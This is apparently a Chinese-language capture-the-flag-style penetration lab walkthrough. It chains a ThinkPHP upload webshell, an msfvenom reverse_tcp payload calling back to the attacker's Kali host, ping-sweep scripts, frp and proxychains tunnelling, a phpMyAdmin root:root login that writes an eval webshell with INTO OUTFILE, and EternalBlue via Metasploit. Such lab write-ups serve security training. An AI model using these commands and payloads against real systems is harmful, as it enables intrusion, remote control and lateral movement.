复健另一套渗透靶场🎯
网络拓扑结构如下:
门户网站192.168.1.54
,nmap
扫一下
dirsearch扫入口点python3 dirsearch.py -u 192.168.1.54 -F -e php
得到/shop
,ThinkPHP5.0
,修改头像上传图片的地方就有文件上传的漏洞,1.png
写一句话马进去
改后缀为.php
重发包,响应数据包看到上传路径/shop/upload/avator/20241111191152329.php
AntSword
连上看看操作系统版本信息
接着想利用msfconsole
写个shell.elf
进去(4444
端口,本地kali ip为88.88.88.88
)
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=88.88.88.88 lport=4444 -f elf > shell.elf
shell.elf
传到/var/www/html/shop/upload/avator/
目录下
赋权限执行后,MSF
成功接收shell
接着扫内网存活情况,仍然传到/var/www/html/shop/upload/avator/
目录下
IPscan.sh
#!/bin/bash
for ip in 192.168.1.{1..254}
do
ping $ip -c 1 &> /dev/null
if [ $? -eq 0 ];then
echo "$ip is alive .... " > ip_result.txt
echo $ip is alive ....
fi
done
扫到192.168.1.182
IP,猜测对应网络拓扑中的“数据库服务器”
NetScan.sh
#!/bin/bash
for ip in 192.168.{1..10}.1
do
ping $ip -c 1 &> /dev/null
if [ $? -eq 0 ];then
echo "$ip is alive .... " > ip_result.txt
echo $ip is alive ....
fi
done
发现存活网段192.168.2.0/24
,改一下IPscan.sh
扫2段网络
.106
和.201
猜测对应网络拓扑中主机A与主机B
传frpc
和frpc.ini
搭建内网隧道
和上一套渗透一样,vim /etc/proxychains.conf
开启dynamic_chain
添加socks5 127.0.0.1 9998
使用代理nmap
扫描
192.168.1.182
的开放端口proxychains4 nmap -Pn -sT 192.168.1.182
,开放22
、80
、3306
端口
192.168.2.106
的开放端口proxychains4 nmap -Pn -sT 192.168.2.106
,80
,135
,139
,445
,3306
,3389
端口开放
firefox
配置代理,登进192.168.2.106:80
内网
proxychain python3 dirsearch.py -u 192.168.2.106:80 -e *
扫到/phpmyadmin
路由
弱密码root:root
登入,在typecho
数据库执行select @@basedir
查看数据库安装路径
发现是phpstudy
建的站,去www
目录下写马
select '<?php @eval($_POST[cmd]);?>' into outfile 'c:/phpstudy/www/11.php';
成功上线
192.168.2.201
的开放端口proxychains4 nmap -Pn -sT 192.168.2.201
445
端口开放怀疑存在永恒之蓝(ms17010)漏洞,首先检测是否存在
proxychains msfconsole
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.2.201
run
打完收工
use exploit/windows/smb/ms17_010_eternalblue
set lhost 88.88.88.88
set rhosts 192.168.2.201
set payload windows/x64/meterpreter/bind_tcp
run
漏洞都有点入门级别了,打着玩了就当